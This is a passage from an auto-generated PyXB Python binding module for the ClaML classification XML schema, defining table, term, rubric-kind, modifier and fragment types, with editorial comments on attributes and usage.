"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 351, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Row uses Python identifier Row
__Row = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Row'), 'Row', '__AbsentNamespace0_CTD_ANON_34_Row', True, pyxb.utils.utility.Location('ClaML.xsd', 358, 4), )
Row = property(__Row.value, __Row.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_34_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 355, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 355, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Row.name() : __Row
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_34 = CTD_ANON_34
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_35 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 359, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Cell uses Python identifier Cell
__Cell = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Cell'), 'Cell', '__AbsentNamespace0_CTD_ANON_35_Cell', True, pyxb.utils.utility.Location('ClaML.xsd', 366, 4), )
Cell = property(__Cell.value, __Cell.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_35_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 363, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 363, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Cell.name() : __Cell
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_35 = CTD_ANON_35
# Complex type [anonymous] with content type MIXED
class CTD_ANON_36 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 367, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_36_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Para uses Python identifier Para
__Para = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Para'), 'Para', '__AbsentNamespace0_CTD_ANON_36_Para', True, pyxb.utils.utility.Location('ClaML.xsd', 264, 4), )
Para = property(__Para.value, __Para.set, None, None)
# Element Include uses Python identifier Include
__Include = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Include'), 'Include', '__AbsentNamespace0_CTD_ANON_36_Include', True, pyxb.utils.utility.Location('ClaML.xsd', 285, 4), )
Include = property(__Include.value, __Include.set, None, None)
# Element List uses Python identifier List
__List = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'List'), 'List', '__AbsentNamespace0_CTD_ANON_36_List', True, pyxb.utils.utility.Location('ClaML.xsd', 297, 4), )
List = property(__List.value, __List.set, None, None)
# Element Table uses Python identifier Table
__Table = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Table'), 'Table', '__AbsentNamespace0_CTD_ANON_36_Table', True, pyxb.utils.utility.Location('ClaML.xsd', 317, 4), )
Table = property(__Table.value, __Table.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_36_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_36_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 375, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 375, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute rowspan uses Python identifier rowspan
__rowspan = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rowspan'), 'rowspan', '__AbsentNamespace0_CTD_ANON_36_rowspan', pyxb.binding.datatypes.anySimpleType)
__rowspan._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 376, 12)
__rowspan._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 376, 12)
rowspan = property(__rowspan.value, __rowspan.set, None, None)
# Attribute colspan uses Python identifier colspan
__colspan = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'colspan'), 'colspan', '__AbsentNamespace0_CTD_ANON_36_colspan', pyxb.binding.datatypes.anySimpleType)
__colspan._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 377, 12)
__colspan._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 377, 12)
colspan = property(__colspan.value, __colspan.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Para.name() : __Para,
__Include.name() : __Include,
__List.name() : __List,
__Table.name() : __Table,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class,
__rowspan.name() : __rowspan,
__colspan.name() : __colspan
})
_module_typeBindings.CTD_ANON_36 = CTD_ANON_36
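
# Editorial note (not PyXB output): CTD_ANON_36 backs the Cell element and
# is the only table type here carrying span attributes.  "class" collides
# with the Python keyword, so PyXB renames the property to class_; rowspan
# and colspan keep their names and, being anySimpleType, take plain string
# values.  Hypothetical sketch:
#
#   cell = Cell('some text')   # mixed content accepts text directly
#   cell.rowspan = '2'
#   cell.colspan = '3'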
# Complex type [anonymous] with content type MIXED
class CTD_ANON_37 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 381, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_37_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 382, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 382, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_37 = CTD_ANON_37
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_38 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 115, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Display uses Python identifier Display
__Display = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Display'), 'Display', '__AbsentNamespace0_CTD_ANON_38_Display', True, pyxb.utils.utility.Location('ClaML.xsd', 136, 4), )
Display = property(__Display.value, __Display.set, None, None)
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_38_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 119, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 119, 12)
name = property(__name.value, __name.set, None, None)
# Attribute inherited uses Python identifier inherited
__inherited = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'inherited'), 'inherited', '__AbsentNamespace0_CTD_ANON_38_inherited', _module_typeBindings.STD_ANON, unicode_default='true')
__inherited._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 120, 12)
__inherited._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 120, 12)
inherited = property(__inherited.value, __inherited.set, None, None)
_ElementMap.update({
__Display.name() : __Display
})
_AttributeMap.update({
__name.name() : __name,
__inherited.name() : __inherited
})
_module_typeBindings.CTD_ANON_38 = CTD_ANON_38
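
# Editorial note (not PyXB output): in CTD_ANON_38 (the RubricKind element),
# "name" is a required xs:ID attribute while "inherited" carries the schema
# default 'true'.  Hypothetical sketch; PyXB binding constructors accept
# attribute values as keyword arguments:
#
#   rk = RubricKind(name='preferred')   # omitting name fails validation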
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_39 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 187, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_39_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element ValidModifierClass uses Python identifier ValidModifierClass
__ValidModifierClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass'), 'ValidModifierClass', '__AbsentNamespace0_CTD_ANON_39_ValidModifierClass', True, pyxb.utils.utility.Location('ClaML.xsd', 211, 4), )
ValidModifierClass = property(__ValidModifierClass.value, __ValidModifierClass.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_39_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 192, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 192, 12)
code = property(__code.value, __code.set, None, None)
# Attribute all uses Python identifier all
__all = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'all'), 'all', '__AbsentNamespace0_CTD_ANON_39_all', _module_typeBindings.STD_ANON_, unicode_default='true')
__all._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 193, 12)
__all._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 193, 12)
all = property(__all.value, __all.set, None, None)
# Attribute position uses Python identifier position
__position = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'position'), 'position', '__AbsentNamespace0_CTD_ANON_39_position', pyxb.binding.datatypes.anySimpleType)
__position._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 201, 12)
__position._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 201, 12)
position = property(__position.value, __position.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_39_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 202, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 202, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__ValidModifierClass.name() : __ValidModifierClass
})
_AttributeMap.update({
__code.name() : __code,
__all.name() : __all,
__position.name() : __position,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_39 = CTD_ANON_39
# Complex type [anonymous] with content type MIXED
class CTD_ANON_40 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 271, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_40_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_40_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_40_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 273, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 273, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_40_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 274, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 274, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__AbsentNamespace0_CTD_ANON_40_type', _module_typeBindings.STD_ANON_2, unicode_default='item')
__type._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 275, 12)
__type._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 275, 12)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class,
__usage.name() : __usage,
__type.name() : __type
})
_module_typeBindings.CTD_ANON_40 = CTD_ANON_40
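
# Editorial note (not PyXB output): in CTD_ANON_40 (the Fragment element),
# "usage" is an xs:IDREF and must match the xs:ID of another element in the
# same document (a UsageKind name, per the ClaML schema), while "type"
# defaults to 'item' via the STD_ANON_2 enumeration defined earlier.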
ClaML = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClaML'), CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 23, 4))
Namespace.addCategoryObject('elementBinding', ClaML.name().localName(), ClaML)
Variants = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variants'), CTD_ANON_, location=pyxb.utils.utility.Location('ClaML.xsd', 41, 4))
Namespace.addCategoryObject('elementBinding', Variants.name().localName(), Variants)
Variant = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variant'), CTD_ANON_2, location=pyxb.utils.utility.Location('ClaML.xsd', 48, 4))
Namespace.addCategoryObject('elementBinding', Variant.name().localName(), Variant)
Meta = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4))
Namespace.addCategoryObject('elementBinding', Meta.name().localName(), Meta)
Identifier = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Identifier'), CTD_ANON_4, location=pyxb.utils.utility.Location('ClaML.xsd', 60, 4))
Namespace.addCategoryObject('elementBinding', Identifier.name().localName(), Identifier)
Title = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Title'), CTD_ANON_5, location=pyxb.utils.utility.Location('ClaML.xsd', 66, 4))
Namespace.addCategoryObject('elementBinding', Title.name().localName(), Title)
Authors = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Authors'), CTD_ANON_6, location=pyxb.utils.utility.Location('ClaML.xsd', 73, 4))
Namespace.addCategoryObject('elementBinding', Authors.name().localName(), Authors)
Author = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Author'), CTD_ANON_7, location=pyxb.utils.utility.Location('ClaML.xsd', 80, 4))
Namespace.addCategoryObject('elementBinding', Author.name().localName(), Author)
ClassKinds = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds'), CTD_ANON_8, location=pyxb.utils.utility.Location('ClaML.xsd', 85, 4))
Namespace.addCategoryObject('elementBinding', ClassKinds.name().localName(), ClassKinds)
RubricKinds = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds'), CTD_ANON_9, location=pyxb.utils.utility.Location('ClaML.xsd', 92, 4))
Namespace.addCategoryObject('elementBinding', RubricKinds.name().localName(), RubricKinds)
UsageKinds = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds'), CTD_ANON_10, location=pyxb.utils.utility.Location('ClaML.xsd', 99, 4))
Namespace.addCategoryObject('elementBinding', UsageKinds.name().localName(), UsageKinds)
ClassKind = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKind'), CTD_ANON_11, location=pyxb.utils.utility.Location('ClaML.xsd', 106, 4))
Namespace.addCategoryObject('elementBinding', ClassKind.name().localName(), ClassKind)
UsageKind = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKind'), CTD_ANON_12, location=pyxb.utils.utility.Location('ClaML.xsd', 130, 4))
Namespace.addCategoryObject('elementBinding', UsageKind.name().localName(), UsageKind)
Display = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Display'), CTD_ANON_13, location=pyxb.utils.utility.Location('ClaML.xsd', 136, 4))
Namespace.addCategoryObject('elementBinding', Display.name().localName(), Display)
Modifier = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Modifier'), CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 142, 4))
Namespace.addCategoryObject('elementBinding', Modifier.name().localName(), Modifier)
ModifierClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass'), CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 154, 4))
Namespace.addCategoryObject('elementBinding', ModifierClass.name().localName(), ModifierClass)
Class = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Class'), CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 169, 4))
Namespace.addCategoryObject('elementBinding', Class.name().localName(), Class)
ExcludeModifier = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier'), CTD_ANON_17, location=pyxb.utils.utility.Location('ClaML.xsd', 205, 4))
Namespace.addCategoryObject('elementBinding', ExcludeModifier.name().localName(), ExcludeModifier)
ValidModifierClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass'), CTD_ANON_18, location=pyxb.utils.utility.Location('ClaML.xsd', 211, 4))
Namespace.addCategoryObject('elementBinding', ValidModifierClass.name().localName(), ValidModifierClass)
Rubric = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4))
Namespace.addCategoryObject('elementBinding', Rubric.name().localName(), Rubric)
Label = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Label'), CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 228, 4))
Namespace.addCategoryObject('elementBinding', Label.name().localName(), Label)
History = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4))
Namespace.addCategoryObject('elementBinding', History.name().localName(), History)
SuperClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), CTD_ANON_22, location=pyxb.utils.utility.Location('ClaML.xsd', 242, 4))
Namespace.addCategoryObject('elementBinding', SuperClass.name().localName(), SuperClass)
SubClass = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4))
Namespace.addCategoryObject('elementBinding', SubClass.name().localName(), SubClass)
Reference = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4))
Namespace.addCategoryObject('elementBinding', Reference.name().localName(), Reference)
Para = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4))
Namespace.addCategoryObject('elementBinding', Para.name().localName(), Para)
Include = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4))
Namespace.addCategoryObject('elementBinding', Include.name().localName(), Include)
IncludeDescendants = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants'), CTD_ANON_27, location=pyxb.utils.utility.Location('ClaML.xsd', 291, 4))
Namespace.addCategoryObject('elementBinding', IncludeDescendants.name().localName(), IncludeDescendants)
List = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4))
Namespace.addCategoryObject('elementBinding', List.name().localName(), List)
ListItem = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ListItem'), CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 305, 4))
Namespace.addCategoryObject('elementBinding', ListItem.name().localName(), ListItem)
Table = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4))
Namespace.addCategoryObject('elementBinding', Table.name().localName(), Table)
Caption = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Caption'), CTD_ANON_31, location=pyxb.utils.utility.Location('ClaML.xsd', 328, 4))
Namespace.addCategoryObject('elementBinding', Caption.name().localName(), Caption)
THead = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'THead'), CTD_ANON_32, location=pyxb.utils.utility.Location('ClaML.xsd', 334, 4))
Namespace.addCategoryObject('elementBinding', THead.name().localName(), THead)
TBody = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TBody'), CTD_ANON_33, location=pyxb.utils.utility.Location('ClaML.xsd', 342, 4))
Namespace.addCategoryObject('elementBinding', TBody.name().localName(), TBody)
TFoot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TFoot'), CTD_ANON_34, location=pyxb.utils.utility.Location('ClaML.xsd', 350, 4))
Namespace.addCategoryObject('elementBinding', TFoot.name().localName(), TFoot)
Row = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4))
Namespace.addCategoryObject('elementBinding', Row.name().localName(), Row)
Cell = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Cell'), CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 366, 4))
Namespace.addCategoryObject('elementBinding', Cell.name().localName(), Cell)
Term = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4))
Namespace.addCategoryObject('elementBinding', Term.name().localName(), Term)
RubricKind = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKind'), CTD_ANON_38, location=pyxb.utils.utility.Location('ClaML.xsd', 114, 4))
Namespace.addCategoryObject('elementBinding', RubricKind.name().localName(), RubricKind)
ModifiedBy = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy'), CTD_ANON_39, location=pyxb.utils.utility.Location('ClaML.xsd', 186, 4))
Namespace.addCategoryObject('elementBinding', ModifiedBy.name().localName(), ModifiedBy)
Fragment = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Fragment'), CTD_ANON_40, location=pyxb.utils.utility.Location('ClaML.xsd', 270, 4))
Namespace.addCategoryObject('elementBinding', Fragment.name().localName(), Fragment)
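
# Editorial usage sketch (not PyXB output).  With the element bindings above
# registered, a ClaML instance document can be parsed with the module-level
# CreateFromDocument() helper that PyXB emits earlier in this file (assumed
# present; outside this excerpt).  Module and file names are hypothetical:
#
#   import claml
#   with open('classification.claml.xml', 'rb') as f:
#       doc = claml.CreateFromDocument(f.read())
#   title = doc.Title        # CTD_ANON_5 instance
#   classes = doc.Class      # repeated CTD_ANON_16 children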
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variants'), CTD_ANON_, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 41, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Identifier'), CTD_ANON_4, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 60, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Title'), CTD_ANON_5, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 66, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Authors'), CTD_ANON_6, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 73, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds'), CTD_ANON_8, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 85, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds'), CTD_ANON_9, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 92, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds'), CTD_ANON_10, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 99, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Modifier'), CTD_ANON_14, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 142, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass'), CTD_ANON_15, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 154, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Class'), CTD_ANON_16, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 169, 4)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
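    # Editorial note: pyxb.utils.fac implements Finite Automata with
    # Counters.  Each CounterCondition below encodes one particle's
    # minOccurs/maxOccurs, each State matches one element use, and the
    # Transition lists say which child may follow which; PyXB walks this
    # automaton to validate and order the element's content.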
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 26, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 27, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 29, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 30, 16))
counters.add(cc_3)
